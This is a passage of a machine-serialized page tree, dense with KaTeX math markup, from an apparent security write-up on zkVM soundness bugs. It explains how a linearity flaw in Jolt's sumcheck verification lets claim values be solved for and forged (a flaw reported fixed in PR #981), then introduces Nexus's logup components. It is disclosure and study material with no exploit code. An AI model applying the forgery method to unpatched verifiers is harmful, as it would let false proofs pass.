",{"type":28,"tag":98,"props":115663,"children":115665},{"className":115664},[3652,3653],[115666],{"type":28,"tag":116,"props":115667,"children":115669},{"className":115668},[3658],[115670],{"type":28,"tag":116,"props":115671,"children":115673},{"className":115672,"ariaHidden":3664},[3663],[115674],{"type":28,"tag":116,"props":115675,"children":115677},{"className":115676},[3669],[115678,115682],{"type":28,"tag":116,"props":115679,"children":115681},{"className":115680,"style":109630},[3674],[],{"type":28,"tag":116,"props":115683,"children":115685},{"className":115684},[3680],[115686,115691],{"type":28,"tag":116,"props":115687,"children":115689},{"className":115688,"style":114748},[3680,21251],[115690],{"type":33,"value":114751},{"type":28,"tag":116,"props":115692,"children":115694},{"className":115693},[3695],[115695],{"type":28,"tag":116,"props":115696,"children":115698},{"className":115697},[3700,21305],[115699,115728],{"type":28,"tag":116,"props":115700,"children":115702},{"className":115701},[3705],[115703,115723],{"type":28,"tag":116,"props":115704,"children":115706},{"className":115705,"style":93192},[3710],[115707],{"type":28,"tag":116,"props":115708,"children":115709},{"style":115383},[115710,115714],{"type":28,"tag":116,"props":115711,"children":115713},{"className":115712,"style":3720},[3719],[],{"type":28,"tag":116,"props":115715,"children":115717},{"className":115716},[3725,3726,3727,3728],[115718],{"type":28,"tag":116,"props":115719,"children":115721},{"className":115720},[3680,21251,3728],[115722],{"type":33,"value":3408},{"type":28,"tag":116,"props":115724,"children":115726},{"className":115725},[21407],[115727],{"type":33,"value":21410},{"type":28,"tag":116,"props":115729,"children":115731},{"className":115730},[3705],[115732],{"type":28,"tag":116,"props":115733,"children":115735},{"className":115734,"style":92746},[3710],[115736],{"type":28,"tag":116,"props":115737,"children":115738},{},[],{"type":33,"value":115740}," values are independent of ",{"type":28,"tag":98,"props":115742,"children":115744},{"className":115743},[3652,3653],[115745],{"type":28,"tag":116,"props":115746,"children":115748},{"className":115747},[3658],[115749],{"type":28,"tag":116,"props":115750,"children":115752},{"className":115751,"ariaHidden":3664},[3663],[115753],{"type":28,"tag":116,"props":115754,"children":115756},{"className":115755},[3669],[115757,115761],{"type":28,"tag":116,"props":115758,"children":115760},{"className":115759,"style":110657},[3674],[],{"type":28,"tag":116,"props":115762,"children":115764},{"className":115763},[3680],[115765,115770],{"type":28,"tag":116,"props":115766,"children":115768},{"className":115767,"style":92897},[3680,21251],[115769],{"type":33,"value":92900},{"type":28,"tag":116,"props":115771,"children":115773},{"className":115772},[3695],[115774],{"type":28,"tag":116,"props":115775,"children":115777},{"className":115776},[3700,21305],[115778,115807],{"type":28,"tag":116,"props":115779,"children":115781},{"className":115780},[3705],[115782,115802],{"type":28,"tag":116,"props":115783,"children":115785},{"className":115784,"style":93192},[3710],[115786],{"type":28,"tag":116,"props":115787,"children":115788},{"style":110089},[115789,115793],{"type":28,"tag":116,"props":115790,"children":115792},{"className":115791,"style":3720},[3719],[],{"type":28,"tag":116,"props":115794,"children":115796},{"className":115795},[3725,3726,3727,3728],[115797],{"type":28,"tag":116,"props":115798,"children":115800},{"className":115799},[3680,21251,3728],[115801],{"type":33,"value":3408},{"type":28,"tag":116,"props":115803,"children":115805},{"className":115804},[21407],[115806],{"type":33,"value":21410},{"type":28,"tag":116,"props":115808,"children":115810},{"className":115809},[3705],[115811],{"type":28,"tag":116,"props":115812,"children":115814},{"className":115813,"style":92746},[3710],[115815],{"type":28,"tag":116,"props":115816,"children":115817},{},[],{"type":33,"value":141},{"type":28,"tag":29,"props":115820,"children":115821},{},[115822],{"type":28,"tag":4995,"props":115823,"children":115824},{},[115825],{"type":33,"value":115826},"Why it's linear:",{"type":28,"tag":29,"props":115828,"children":115829},{},[115830,115832],{"type":33,"value":115831},"Due to the compression optimization (prover omits one less coefficient per round), the final verification equation traces back through the rounds and becomes linear in the input claim ",{"type":28,"tag":98,"props":115833,"children":115835},{"className":115834},[3652,3653],[115836],{"type":28,"tag":116,"props":115837,"children":115839},{"className":115838},[3658],[115840],{"type":28,"tag":116,"props":115841,"children":115843},{"className":115842,"ariaHidden":3664},[3663],[115844],{"type":28,"tag":116,"props":115845,"children":115847},{"className":115846},[3669],[115848,115852],{"type":28,"tag":116,"props":115849,"children":115851},{"className":115850,"style":21246},[3674],[],{"type":28,"tag":116,"props":115853,"children":115855},{"className":115854,"style":92897},[3680,21251],[115856],{"type":33,"value":92900},{"type":28,"tag":29,"props":115858,"children":115859},{},[115860],{"type":28,"tag":98,"props":115861,"children":115863},{"className":115862},[3652,3653],[115864],{"type":28,"tag":116,"props":115865,"children":115867},{"className":115866},[3658],[115868],{"type":28,"tag":116,"props":115869,"children":115871},{"className":115870,"ariaHidden":3664},[3663],[115872,115962,115988,116014],{"type":28,"tag":116,"props":115873,"children":115875},{"className":115874},[3669],[115876,115880,115949,115953,115958],{"type":28,"tag":116,"props":115877,"children":115879},{"className":115878,"style":110657},[3674],[],{"type":28,"tag":116,"props":115881,"children":115883},{"className":115882},[3680],[115884,115890],{"type":28,"tag":116,"props":115885,"children":115887},{"className":115886,"style":21782},[3680,21251],[115888],{"type":33,"value":115889},"C",{"type":28,"tag":116,"props":115891,"children":115893},{"className":115892},[3695],[115894],{"type":28,"tag":116,"props":115895,"children":115897},{"className":115896},[3700,21305],[115898,115938],{"type":28,"tag":116,"props":115899,"children":115901},{"className":115900},[3705],[115902,115933],{"type":28,"tag":116,"props":115903,"children":115906},{"className":115904,"style":115905},[3710],"height:0.3361em;",[115907],{"type":28,"tag":116,"props":115908,"children":115910},{"style":115909},"top:-2.55em;margin-left:-0.0715em;margin-right:0.05em;",[115911,115915],{"type":28,"tag":116,"props":115912,"children":115914},{"className":115913,"style":3720},[3719],[],{"type":28,"tag":116,"props":115916,"children":115918},{"className":115917},[3725,3726,3727,3728],[115919],{"type":28,"tag":116,"props":115920,"children":115922},{"className":115921},[3680,3728],[115923],{"type":28,"tag":116,"props":115924,"children":115926},{"className":115925},[3680,33,3728],[115927],{"type":28,"tag":116,"props":115928,"children":115930},{"className":115929},[3680,3728],[115931],{"type":33,"value":115932},"final",{"type":28,"tag":116,"props":115934,"children":115936},{"className":115935},[21407],[115937],{"type":33,"value":21410},{"type":28,"tag":116,"props":115939,"children":115941},{"className":115940},[3705],[115942],{"type":28,"tag":116,"props":115943,"children":115945},{"className":115944,"style":92746},[3710],[115946],{"type":28,"tag":116,"props":115947,"children":115948},{},[],{"type":28,"tag":116,"props":115950,"children":115952},{"className":115951,"style":3857},[3759],[],{"type":28,"tag":116,"props":115954,"children":115956},{"className":115955},[3862],[115957],{"type":33,"value":373},{"type":28,"tag":116,"props":115959,"children":115961},{"className":115960,"style":3857},[3759],[],{"type":28,"tag":116,"props":115963,"children":115965},{"className":115964},[3669],[115966,115970,115975,115979,115984],{"type":28,"tag":116,"props":115967,"children":115969},{"className":115968,"style":114743},[3674],[],{"type":28,"tag":116,"props":115971,"children":115973},{"className":115972},[3680,21251],[115974],{"type":33,"value":87},{"type":28,"tag":116,"props":115976,"children":115978},{"className":115977,"style":3760},[3759],[],{"type":28,"tag":116,"props":115980,"children":115982},{"className":115981},[3765],[115983],{"type":33,"value":110922},{"type":28,"tag":116,"props":115985,"children":115987},{"className":115986,"style":3760},[3759],[],{"type":28,"tag":116,"props":115989,"children":115991},{"className":115990},[3669],[115992,115996,116001,116005,116010],{"type":28,"tag":116,"props":115993,"children":115995},{"className":115994,"style":114772},[3674],[],{"type":28,"tag":116,"props":115997,"children":115999},{"className":115998,"style":92897},[3680,21251],[116000],{"type":33,"value":92900},{"type":28,"tag":116,"props":116002,"children":116004},{"className":116003,"style":3760},[3759],[],{"type":28,"tag":116,"props":116006,"children":116008},{"className":116007},[3765],[116009],{"type":33,"value":2268},{"type":28,"tag":116,"props":116011,"children":116013},{"className":116012,"style":3760},[3759],[],{"type":28,"tag":116,"props":116015,"children":116017},{"className":116016},[3669],[116018,116022],{"type":28,"tag":116,"props":116019,"children":116021},{"className":116020,"style":92578},[3674],[],{"type":28,"tag":116,"props":116023,"children":116025},{"className":116024},[3680,21251],[116026],{"type":33,"value":2893},{"type":28,"tag":29,"props":116028,"children":116029},{},[116030,116031,116070,116072,116097,116099,116229,116231,116352],{"type":33,"value":115496},{"type":28,"tag":98,"props":116032,"children":116034},{"className":116033},[3652,3653],[116035],{"type":28,"tag":116,"props":116036,"children":116038},{"className":116037},[3658],[116039],{"type":28,"tag":116,"props":116040,"children":116042},{"className":116041,"ariaHidden":3664},[3663],[116043],{"type":28,"tag":116,"props":116044,"children":116046},{"className":116045},[3669],[116047,116051,116056,116061,116065],{"type":28,"tag":116,"props":116048,"children":116050},{"className":116049,"style":114715},[3674],[],{"type":28,"tag":116,"props":116052,"children":116054},{"className":116053},[3680,21251],[116055],{"type":33,"value":87},{"type":28,"tag":116,"props":116057,"children":116059},{"className":116058},[3791],[116060],{"type":33,"value":3794},{"type":28,"tag":116,"props":116062,"children":116064},{"className":116063,"style":3798},[3759],[],{"type":28,"tag":116,"props":116066,"children":116068},{"className":116067},[3680,21251],[116069],{"type":33,"value":2893},{"type":33,"value":116071}," are determined by the transcript (independent of ",{"type":28,"tag":98,"props":116073,"children":116075},{"className":116074},[3652,3653],[116076],{"type":28,"tag":116,"props":116077,"children":116079},{"className":116078},[3658],[116080],{"type":28,"tag":116,"props":116081,"children":116083},{"className":116082,"ariaHidden":3664},[3663],[116084],{"type":28,"tag":116,"props":116085,"children":116087},{"className":116086},[3669],[116088,116092],{"type":28,"tag":116,"props":116089,"children":116091},{"className":116090,"style":21246},[3674],[],{"type":28,"tag":116,"props":116093,"children":116095},{"className":116094,"style":92897},[3680,21251],[116096],{"type":33,"value":92900},{"type":33,"value":116098},"). The verifier checks that ",{"type":28,"tag":98,"props":116100,"children":116102},{"className":116101},[3652,3653],[116103],{"type":28,"tag":116,"props":116104,"children":116106},{"className":116105},[3658],[116107],{"type":28,"tag":116,"props":116108,"children":116110},{"className":116109,"ariaHidden":3664},[3663],[116111,116197],{"type":28,"tag":116,"props":116112,"children":116114},{"className":116113},[3669],[116115,116119,116184,116188,116193],{"type":28,"tag":116,"props":116116,"children":116118},{"className":116117,"style":110657},[3674],[],{"type":28,"tag":116,"props":116120,"children":116122},{"className":116121},[3680],[116123,116128],{"type":28,"tag":116,"props":116124,"children":116126},{"className":116125,"style":21782},[3680,21251],[116127],{"type":33,"value":115889},{"type":28,"tag":116,"props":116129,"children":116131},{"className":116130},[3695],[116132],{"type":28,"tag":116,"props":116133,"children":116135},{"className":116134},[3700,21305],[116136,116173],{"type":28,"tag":116,"props":116137,"children":116139},{"className":116138},[3705],[116140,116168],{"type":28,"tag":116,"props":116141,"children":116143},{"className":116142,"style":115905},[3710],[116144],{"type":28,"tag":116,"props":116145,"children":116146},{"style":115909},[116147,116151],{"type":28,"tag":116,"props":116148,"children":116150},{"className":116149,"style":3720},[3719],[],{"type":28,"tag":116,"props":116152,"children":116154},{"className":116153},[3725,3726,3727,3728],[116155],{"type":28,"tag":116,"props":116156,"children":116158},{"className":116157},[3680,3728],[116159],{"type":28,"tag":116,"props":116160,"children":116162},{"className":116161},[3680,33,3728],[116163],{"type":28,"tag":116,"props":116164,"children":116166},{"className":116165},[3680,3728],[116167],{"type":33,"value":115932},{"type":28,"tag":116,"props":116169,"children":116171},{"className":116170},[21407],[116172],{"type":33,"value":21410},{"type":28,"tag":116,"props":116174,"children":116176},{"className":116175},[3705],[116177],{"type":28,"tag":116,"props":116178,"children":116180},{"className":116179,"style":92746},[3710],[116181],{"type":28,"tag":116,"props":116182,"children":116183},{},[],{"type":28,"tag":116,"props":116185,"children":116187},{"className":116186,"style":3857},[3759],[],{"type":28,"tag":116,"props":116189,"children":116191},{"className":116190},[3862],[116192],{"type":33,"value":373},{"type":28,"tag":116,"props":116194,"children":116196},{"className":116195,"style":3857},[3759],[],{"type":28,"tag":116,"props":116198,"children":116200},{"className":116199},[3669],[116201,116205,116215,116220],{"type":28,"tag":116,"props":116202,"children":116204},{"className":116203,"style":94076},[3674],[],{"type":28,"tag":116,"props":116206,"children":116208},{"className":116207},[3680,33],[116209],{"type":28,"tag":116,"props":116210,"children":116212},{"className":116211},[3680],[116213],{"type":33,"value":116214},"expected",{"type":28,"tag":116,"props":116216,"children":116218},{"className":116217,"style":92663},[3680],[116219],{"type":33,"value":2754},{"type":28,"tag":116,"props":116221,"children":116223},{"className":116222},[3680,33],[116224],{"type":28,"tag":116,"props":116225,"children":116227},{"className":116226},[3680],[116228],{"type":33,"value":37171},{"type":33,"value":116230}," (from PCS opening), this becomes ",{"type":28,"tag":98,"props":116232,"children":116234},{"className":116233},[3652,3653],[116235],{"type":28,"tag":116,"props":116236,"children":116238},{"className":116237},[3658],[116239],{"type":28,"tag":116,"props":116240,"children":116242},{"className":116241,"ariaHidden":3664},[3663],[116243,116269,116295,116321],{"type":28,"tag":116,"props":116244,"children":116246},{"className":116245},[3669],[116247,116251,116256,116260,116265],{"type":28,"tag":116,"props":116248,"children":116250},{"className":116249,"style":114743},[3674],[],{"type":28,"tag":116,"props":116252,"children":116254},{"className":116253},[3680,21251],[116255],{"type":33,"value":87},{"type":28,"tag":116,"props":116257,"children":116259},{"className":116258,"style":3760},[3759],[],{"type":28,"tag":116,"props":116261,"children":116263},{"className":116262},[3765],[116264],{"type":33,"value":110922},{"type":28,"tag":116,"props":116266,"children":116268},{"className":116267,"style":3760},[3759],[],{"type":28,"tag":116,"props":116270,"children":116272},{"className":116271},[3669],[116273,116277,116282,116286,116291],{"type":28,"tag":116,"props":116274,"children":116276},{"className":116275,"style":114772},[3674],[],{"type":28,"tag":116,"props":116278,"children":116280},{"className":116279,"style":92897},[3680,21251],[116281],{"type":33,"value":92900},{"type":28,"tag":116,"props":116283,"children":116285},{"className":116284,"style":3760},[3759],[],{"type":28,"tag":116,"props":116287,"children":116289},{"className":116288},[3765],[116290],{"type":33,"value":2268},{"type":28,"tag":116,"props":116292,"children":116294},{"className":116293,"style":3760},[3759],[],{"type":28,"tag":116,"props":116296,"children":116298},{"className":116297},[3669],[116299,116303,116308,116312,116317],{"type":28,"tag":116,"props":116300,"children":116302},{"className":116301,"style":92578},[3674],[],{"type":28,"tag":116,"props":116304,"children":116306},{"className":116305},[3680,21251],[116307],{"type":33,"value":2893},{"type":28,"tag":116,"props":116309,"children":116311},{"className":116310,"style":3857},[3759],[],{"type":28,"tag":116,"props":116313,"children":116315},{"className":116314},[3862],[116316],{"type":33,"value":373},{"type":28,"tag":116,"props":116318,"children":116320},{"className":116319,"style":3857},[3759],[],{"type":28,"tag":116,"props":116322,"children":116324},{"className":116323},[3669],[116325,116329,116338,116343],{"type":28,"tag":116,"props":116326,"children":116328},{"className":116327,"style":94076},[3674],[],{"type":28,"tag":116,"props":116330,"children":116332},{"className":116331},[3680,33],[116333],{"type":28,"tag":116,"props":116334,"children":116336},{"className":116335},[3680],[116337],{"type":33,"value":116214},{"type":28,"tag":116,"props":116339,"children":116341},{"className":116340,"style":92663},[3680],[116342],{"type":33,"value":2754},{"type":28,"tag":116,"props":116344,"children":116346},{"className":116345},[3680,33],[116347],{"type":28,"tag":116,"props":116348,"children":116350},{"className":116349},[3680],[116351],{"type":33,"value":37171},{"type":33,"value":141},{"type":28,"tag":29,"props":116354,"children":116355},{},[116356],{"type":33,"value":116357},"Because multiple claims are coupled across verification stages, the attacker may need to adjust a small set of claim values simultaneously to satisfy all affected constraints.",{"type":28,"tag":29,"props":116359,"children":116360},{},[116361],{"type":33,"value":116362},"This can be exploited by solving a small linear system over a handful of unbound claim values so all affected checks pass simultaneously.",{"type":28,"tag":29,"props":116364,"children":116365},{},[116366,116371,116373],{"type":28,"tag":4995,"props":116367,"children":116368},{},[116369],{"type":33,"value":116370},"Status:",{"type":33,"value":116372}," Fixed on October 3, 2025 via ",{"type":28,"tag":87,"props":116374,"children":116377},{"href":116375,"rel":116376},"https://github.com/a16z/jolt/pull/981",[91],[116378],{"type":33,"value":116379},"PR #981",{"type":28,"tag":18457,"props":116381,"children":116382},{},[],{"type":28,"tag":75,"props":116384,"children":116386},{"id":116385},"nexus",[116387],{"type":33,"value":107479},{"type":28,"tag":29,"props":116389,"children":116390},{},[116391],{"type":33,"value":116392},"Nexus is a zkVM built on the Stwo prover (from StarkWare). It uses STARKs with logup lookup arguments.",{"type":28,"tag":29,"props":116394,"children":116395},{},[116396,116398,116403],{"type":33,"value":116397},"Nexus splits verification into ",{"type":28,"tag":4995,"props":116399,"children":116400},{},[116401],{"type":33,"value":116402},"components",{"type":33,"value":116404}," such as instruction execution, memory, registers, etc. Each component handles a subset of constraints.",{"type":28,"tag":29,"props":116406,"children":116407},{},[116408,116410,116415],{"type":33,"value":116409},"Each component emits and consumes lookup tuples. The component's ",{"type":28,"tag":98,"props":116411,"children":116413},{"className":116412},[],[116414],{"type":33,"value":114524},{"type":33,"value":116416}," summarizes its net contribution:",{"type":28,"tag":29,"props":116418,"children":116419},{},[116420],{"type":28,"tag":98,"props":116421,"children":116423},{"className":116422},[3652,3653],[116424],{"type":28,"tag":116,"props":116425,"children":116427},{"className":116426},[3658],[116428],{"type":28,"tag":116,"props":116429,"children":116431},{"className":116430,"ariaHidden":3664},[3663],[116432,116528,116777],{"type":28,"tag":116,"props":116433,"children":116435},{"className":116434},[3669],[116436,116440,116449,116454,116515,116519,116524],{"type":28,"tag":116,"props":116437,"children":116439},{"className":116438,"style":94076},[3674],[],{"type":28,"tag":116,"props":116441,"children":116443},{"className":116442},[3680,33],[116444],{"type":28,"tag":116,"props":116445,"children":116447},{"className":116446},[3680],[116448],{"type":33,"value":113753},{"type":28,"tag":116,"props":116450,"children":116452},{"className":116451,"style":92663},[3680],[116453],{"type":33,"value":2754},{"type":28,"tag":116,"props":116455,"children":116457},{"className":116456},[3680],[116458,116467],{"type":28,"tag":116,"props":116459,"children":116461},{"className":116460},[3680,33],[116462],{"type":28,"tag":116,"props":116463,"children":116465},{"className":116464},[3680],[116466],{"type":33,"value":76252},{"type":28,"tag":116,"props":116468,"children":116470},{"className":116469},[3695],[116471],{"type":28,"tag":116,"props":116472,"children":116474},{"className":116473},[3700,21305],[116475,116504],{"type":28,"tag":116,"props":116476,"children":116478},{"className":116477},[3705],[116479,116499],{"type":28,"tag":116,"props":116480,"children":116482},{"className":116481,"style":93192},[3710],[116483],{"type":28,"tag":116,"props":116484,"children":116485},{"style":113790},[116486,116490],{"type":28,"tag":116,"props":116487,"children":116489},{"className":116488,"style":3720},[3719],[],{"type":28,"tag":116,"props":116491,"children":116493},{"className":116492},[3725,3726,3727,3728],[116494],{"type":28,"tag":116,"props":116495,"children":116497},{"className":116496},[3680,21251,3728],[116498],{"type":33,"value":3408},{"type":28,"tag":116,"props":116500,"children":116502},{"className":116501},[21407],[116503],{"type":33,"value":21410},{"type":28,"tag":116,"props":116505,"children":116507},{"className":116506},[3705],[116508],{"type":28,"tag":116,"props":116509,"children":116511},{"className":116510,"style":92746},[3710],[116512],{"type":28,"tag":116,"props":116513,"children":116514},{},[],{"type":28,"tag":116,"props":116516,"children":116518},{"className":116517,"style":3857},[3759],[],{"type":28,"tag":116,"props":116520,"children":116522},{"className":116521},[3862],[116523],{"type":33,"value":373},{"type":28,"tag":116,"props":116525,"children":116527},{"className":116526,"style":3857},[3759],[],{"type":28,"tag":116,"props":116529,"children":116531},{"className":116530},[3669],[116532,116537,116594,116598,116764,116768,116773],{"type":28,"tag":116,"props":116533,"children":116536},{"className":116534,"style":116535},[3674],"height:1.4734em;vertical-align:-0.6283em;",[],{"type":28,"tag":116,"props":116538,"children":116540},{"className":116539},[21287],[116541,116546],{"type":28,"tag":116,"props":116542,"children":116544},{"className":116543,"style":21294},[21287,21292,21293],[116545],{"type":33,"value":108455},{"type":28,"tag":116,"props":116547,"children":116549},{"className":116548},[3695],[116550],{"type":28,"tag":116,"props":116551,"children":116553},{"className":116552},[3700,21305],[116554,116583],{"type":28,"tag":116,"props":116555,"children":116557},{"className":116556},[3705],[116558,116578],{"type":28,"tag":116,"props":116559,"children":116561},{"className":116560,"style":113867},[3710],[116562],{"type":28,"tag":116,"props":116563,"children":116564},{"style":21318},[116565,116569],{"type":28,"tag":116,"props":116566,"children":116568},{"className":116567,"style":3720},[3719],[],{"type":28,"tag":116,"props":116570,"children":116572},{"className":116571},[3725,3726,3727,3728],[116573],{"type":28,"tag":116,"props":116574,"children":116576},{"className":116575,"style":113883},[3680,21251,3728],[116577],{"type":33,"value":8328},{"type":28,"tag":116,"props":116579,"children":116581},{"className":116580},[21407],[116582],{"type":33,"value":21410},{"type":28,"tag":116,"props":116584,"children":116586},{"className":116585},[3705],[116587],{"type":28,"tag":116,"props":116588,"children":116590},{"className":116589,"style":113898},[3710],[116591],{"type":28,"tag":116,"props":116592,"children":116593},{},[],{"type":28,"tag":116,"props":116595,"children":116597},{"className":116596,"style":3798},[3759],[],{"type":28,"tag":116,"props":116599,"children":116601},{"className":116600},[3680],[116602,116606,116760],{"type":28,"tag":116,"props":116603,"children":116605},{"className":116604},[21380,113178],[],{"type":28,"tag":116,"props":116607,"children":116609},{"className":116608},[113183],[116610],{"type":28,"tag":116,"props":116611,"children":116613},{"className":116612},[3700,21305],[116614,116748],{"type":28,"tag":116,"props":116615,"children":116617},{"className":116616},[3705],[116618,116743],{"type":28,"tag":116,"props":116619,"children":116621},{"className":116620,"style":113196},[3710],[116622,116712,116723],{"type":28,"tag":116,"props":116623,"children":116624},{"style":113200},[116625,116629],{"type":28,"tag":116,"props":116626,"children":116628},{"className":116627,"style":111831},[3719],[],{"type":28,"tag":116,"props":116630,"children":116632},{"className":116631},[3725,3726,3727,3728],[116633],{"type":28,"tag":116,"props":116634,"children":116636},{"className":116635},[3680,3728],[116637,116642,116647],{"type":28,"tag":116,"props":116638,"children":116640},{"className":116639,"style":113217},[3680,21251,3728],[116641],{"type":33,"value":113220},{"type":28,"tag":116,"props":116643,"children":116645},{"className":116644},[3765,3728],[116646],{"type":33,"value":3739},{"type":28,"tag":116,"props":116648,"children":116650},{"className":116649},[3680,3728],[116651,116661],{"type":28,"tag":116,"props":116652,"children":116654},{"className":116653},[3680,33,3728],[116655],{"type":28,"tag":116,"props":116656,"children":116658},{"className":116657},[3680,3728],[116659],{"type":33,"value":116660},"produced",{"type":28,"tag":116,"props":116662,"children":116664},{"className":116663},[3695],[116665],{"type":28,"tag":116,"props":116666,"children":116668},{"className":116667},[3700,21305],[116669,116700],{"type":28,"tag":116,"props":116670,"children":116672},{"className":116671},[3705],[116673,116695],{"type":28,"tag":116,"props":116674,"children":116677},{"className":116675,"style":116676},[3710],"height:0.2052em;",[116678],{"type":28,"tag":116,"props":116679,"children":116681},{"style":116680},"top:-2.2341em;margin-right:0.0714em;",[116682,116686],{"type":28,"tag":116,"props":116683,"children":116685},{"className":116684,"style":108520},[3719],[],{"type":28,"tag":116,"props":116687,"children":116689},{"className":116688},[3725,108525,108526,3728],[116690],{"type":28,"tag":116,"props":116691,"children":116693},{"className":116692,"style":113883},[3680,21251,3728],[116694],{"type":33,"value":8328},{"type":28,"tag":116,"props":116696,"children":116698},{"className":116697},[21407],[116699],{"type":33,"value":21410},{"type":28,"tag":116,"props":116701,"children":116703},{"className":116702},[3705],[116704],{"type":28,"tag":116,"props":116705,"children":116708},{"className":116706,"style":116707},[3710],"height:0.4048em;",[116709],{"type":28,"tag":116,"props":116710,"children":116711},{},[],{"type":28,"tag":116,"props":116713,"children":116714},{"style":113233},[116715,116719],{"type":28,"tag":116,"props":116716,"children":116718},{"className":116717,"style":111831},[3719],[],{"type":28,"tag":116,"props":116720,"children":116722},{"className":116721,"style":113243},[113242],[],{"type":28,"tag":116,"props":116724,"children":116725},{"style":113247},[116726,116730],{"type":28,"tag":116,"props":116727,"children":116729},{"className":116728,"style":111831},[3719],[],{"type":28,"tag":116,"props":116731,"children":116733},{"className":116732},[3725,3726,3727,3728],[116734],{"type":28,"tag":116,"props":116735,"children":116737},{"className":116736},[3680,3728],[116738],{"type":28,"tag":116,"props":116739,"children":116741},{"className":116740},[3680,3728],[116742],{"type":33,"value":1824},{"type":28,"tag":116,"props":116744,"children":116746},{"className":116745},[21407],[116747],{"type":33,"value":21410},{"type":28,"tag":116,"props":116749,"children":116751},{"className":116750},[3705],[116752],{"type":28,"tag":116,"props":116753,"children":116756},{"className":116754,"style":116755},[3710],"height:0.6283em;",[116757],{"type":28,"tag":116,"props":116758,"children":116759},{},[],{"type":28,"tag":116,"props":116761,"children":116763},{"className":116762},[21401,113178],[],{"type":28,"tag":116,"props":116765,"children":116767},{"className":116766,"style":3760},[3759],[],{"type":28,"tag":116,"props":116769,"children":116771},{"className":116770},[3765],[116772],{"type":33,"value":3739},{"type":28,"tag":116,"props":116774,"children":116776},{"className":116775,"style":3760},[3759],[],{"type":28,"tag":116,"props":116778,"children":116780},{"className":116779},[3669],[116781,116785,116842,116846],{"type":28,"tag":116,"props":116782,"children":116784},{"className":116783,"style":114092},[3674],[],{"type":28,"tag":116,"props":116786,"children":116788},{"className":116787},[21287],[116789,116794],{"type":28,"tag":116,"props":116790,"children":116792},{"className":116791,"style":21294},[21287,21292,21293],[116793],{"type":33,"value":108455},{"type":28,"tag":116,"props":116795,"children":116797},{"className":116796},[3695],[116798],{"type":28,"tag":116,"props":116799,"children":116801},{"className":116800},[3700,21305],[116802,116831],{"type":28,"tag":116,"props":116803,"children":116805},{"className":116804},[3705],[116806,116826],{"type":28,"tag":116,"props":116807,"children":116809},{"className":116808,"style":113332},[3710],[116810],{"type":28,"tag":116,"props":116811,"children":116812},{"style":21318},[116813,116817],{"type":28,"tag":116,"props":116814,"children":116816},{"className":116815,"style":3720},[3719],[],{"type":28,"tag":116,"props":116818,"children":116820},{"className":116819},[3725,3726,3727,3728],[116821],{"type":28,"tag":116,"props":116822,"children":116824},{"className":116823,"style":94092},[3680,21251,3728],[116825],{"type":33,"value":88302},{"type":28,"tag":116,"props":116827,"children":116829},{"className":116828},[21407],[116830],{"type":33,"value":21410},{"type":28,"tag":116,"props":116832,"children":116834},{"className":116833},[3705],[116835],{"type":28,"tag":116,"props":116836,"children":116838},{"className":116837,"style":114147},[3710],[116839],{"type":28,"tag":116,"props":116840,"children":116841},{},[],{"type":28,"tag":116,"props":116843,"children":116845},{"className":116844,"style":3798},[3759],[],{"type":28,"tag":116,"props":116847,"children":116849},{"className":116848},[3680],[116850,116854,117004],{"type":28,"tag":116,"props":116851,"children":116853},{"className":116852},[21380,113178],[],{"type":28,"tag":116,"props":116855,"children":116857},{"className":116856},[113183],[116858],{"type":28,"tag":116,"props":116859,"children":116861},{"className":116860},[3700,21305],[116862,116993],{"type":28,"tag":116,"props":116863,"children":116865},{"className":116864},[3705],[116866,116988],{"type":28,"tag":116,"props":116867,"children":116869},{"className":116868,"style":113196},[3710],[116870,116957,116968],{"type":28,"tag":116,"props":116871,"children":116872},{"style":113200},[116873,116877],{"type":28,"tag":116,"props":116874,"children":116876},{"className":116875,"style":111831},[3719],[],{"type":28,"tag":116,"props":116878,"children":116880},{"className":116879},[3725,3726,3727,3728],[116881],{"type":28,"tag":116,"props":116882,"children":116884},{"className":116883},[3680,3728],[116885,116890,116895],{"type":28,"tag":116,"props":116886,"children":116888},{"className":116887,"style":113217},[3680,21251,3728],[116889],{"type":33,"value":113220},{"type":28,"tag":116,"props":116891,"children":116893},{"className":116892},[3765,3728],[116894],{"type":33,"value":3739},{"type":28,"tag":116,"props":116896,"children":116898},{"className":116897},[3680,3728],[116899,116909],{"type":28,"tag":116,"props":116900,"children":116902},{"className":116901},[3680,33,3728],[116903],{"type":28,"tag":116,"props":116904,"children":116906},{"className":116905},[3680,3728],[116907],{"type":33,"value":116908},"consumed",{"type":28,"tag":116,"props":116910,"children":116912},{"className":116911},[3695],[116913],{"type":28,"tag":116,"props":116914,"children":116916},{"className":116915},[3700,21305],[116917,116946],{"type":28,"tag":116,"props":116918,"children":116920},{"className":116919},[3705],[116921,116941],{"type":28,"tag":116,"props":116922,"children":116924},{"className":116923,"style":111992},[3710],[116925],{"type":28,"tag":116,"props":116926,"children":116927},{"style":114237},[116928,116932],{"type":28,"tag":116,"props":116929,"children":116931},{"className":116930,"style":108520},[3719],[],{"type":28,"tag":116,"props":116933,"children":116935},{"className":116934},[3725,108525,108526,3728],[116936],{"type":28,"tag":116,"props":116937,"children":116939},{"className":116938,"style":94092},[3680,21251,3728],[116940],{"type":33,"value":88302},{"type":28,"tag":116,"props":116942,"children":116944},{"className":116943},[21407],[116945],{"type":33,"value":21410},{"type":28,"tag":116,"props":116947,"children":116949},{"className":116948},[3705],[116950],{"type":28,"tag":116,"props":116951,"children":116953},{"className":116952,"style":114264},[3710],[116954],{"type":28,"tag":116,"props":116955,"children":116956},{},[],{"type":28,"tag":116,"props":116958,"children":116959},{"style":113233},[116960,116964],{"type":28,"tag":116,"props":116961,"children":116963},{"className":116962,"style":111831},[3719],[],{"type":28,"tag":116,"props":116965,"children":116967},{"className":116966,"style":113243},[113242],[],{"type":28,"tag":116,"props":116969,"children":116970},{"style":113247},[116971,116975],{"type":28,"tag":116,"props":116972,"children":116974},{"className":116973,"style":111831},[3719],[],{"type":28,"tag":116,"props":116976,"children":116978},{"className":116977},[3725,3726,3727,3728],[116979],{"type":28,"tag":116,"props":116980,"children":116982},{"className":116981},[3680,3728],[116983],{"type":28,"tag":116,"props":116984,"children":116986},{"className":116985},[3680,3728],[116987],{"type":33,"value":1824},{"type":28,"tag":116,"props":116989,"children":116991},{"className":116990},[21407],[116992],{"type":33,"value":21410},{"type":28,"tag":116,"props":116994,"children":116996},{"className":116995},[3705],[116997],{"type":28,"tag":116,"props":116998,"children":117000},{"className":116999,"style":114312},[3710],[117001],{"type":28,"tag":116,"props":117002,"children":117003},{},[],{"type":28,"tag":116,"props":117005,"children":117007},{"className":117006},[21401,113178],[],{"type":28,"tag":29,"props":117009,"children":11701